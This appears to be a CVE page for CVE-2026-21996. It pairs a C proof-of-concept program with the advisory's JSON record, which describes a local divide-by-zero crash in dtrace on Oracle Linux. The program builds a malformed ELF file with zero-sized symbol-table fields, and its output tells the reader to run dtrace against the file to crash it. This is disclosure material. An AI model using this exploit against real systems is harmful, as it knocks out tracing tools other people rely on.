CVE-2026-21996

/* * PoC for CVE-2026-21996 * This code generates a malformed ELF binary designed to trigger * the integer divide-by-zero in Pbuild_file_symtab(). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> // ELF Header structure (simplified for 64-bit) typedef struct { unsigned char e_ident[16]; uint16_t e_type; uint16_t e_machine; uint32_t e_version; uint64_t e_entry; uint64_t e_phoff; uint64_t e_shoff; uint32_t e_flags; uint16_t e_ehsize; uint16_t e_phentsize; uint16_t e_phnum; uint16_t e_shentsize; uint16_t e_shnum; uint16_t e_shstrndx; } Elf64_Ehdr; // Section Header structure typedef struct { uint32_t sh_name; uint32_t sh_type; uint64_t sh_flags; uint64_t sh_addr; uint64_t sh_offset; uint64_t sh_size; uint32_t sh_link; uint32_t sh_info; uint64_t sh_addralign; uint64_t sh_entsize; } Elf64_Shdr; int main(int argc, char *argv[]) { FILE *fp = fopen("malicious_elf", "wb"); if (!fp) { perror("Failed to create file"); return 1; } // 1. Setup ELF Header Elf64_Ehdr ehdr; memset(&ehdr, 0, sizeof(ehdr)); memcpy(ehdr.e_ident, "\x7fELF", 4); ehdr.e_ident[4] = 2; // ELFCLASS64 ehdr.e_ident[5] = 1; // ELFDATA2LSB ehdr.e_ident[6] = 1; // EV_CURRENT ehdr.e_type = 2; // ET_EXEC ehdr.e_machine = 62; // EM_X86_64 ehdr.e_version = 1; ehdr.e_shoff = sizeof(ehdr); // Section header right after ELF header ehdr.e_ehsize = sizeof(ehdr); ehdr.e_shentsize = sizeof(Elf64_Shdr); ehdr.e_shnum = 1; // One section header fwrite(&ehdr, sizeof(ehdr), 1, fp); // 2. Setup Malicious Section Header (Symtab) Elf64_Shdr shdr; memset(&shdr, 0, sizeof(shdr)); shdr.sh_type = 2; // SHT_SYMTAB // Logic: If parser divides by sh_entsize or sh_size without checking, // setting them to 0 triggers the crash. shdr.sh_entsize = 0; shdr.sh_size = 0; fwrite(&shdr, sizeof(shdr), 1, fp); fclose(fp); printf("[+] Malicious ELF 'malicious_elf' created.\n"); printf("[+] Trigger: Run dtrace against this file to crash the process.\n"); return 0; }

{"cve": {"id": "CVE-2026-21996", "sourceIdentifier": "[email protected]", "published": "2026-05-01T18:16:13.750", "lastModified": "2026-05-05T17:45:58.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unprivileged attacker can reliably trigger a crash of the dtrace process with a malicious ELF binary due to an integer Divide-by-Zero in Pbuild_file_symtab()"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:8:-:*:*:*:*:*:*", "matchCriteriaId": "CA9021D6-6027-42E9-A12D-7EA32C5C63F1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:9:0:*:*:*:*:*:*", "matchCriteriaId": "C848CA1D-A42D-4AF1-9D95-E6268F9C1880"}, {"vulnerable": true, "criteria": "cpe:2.3:o:oracle:linux:10:0:*:*:*:*:*:*", "matchCriteriaId": "1F606DC6-31B5-4102-B174-D565662C4829"}]}]}], "references": [{"url": "https://linux.oracle.com/cve/CVE-2026-21996.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}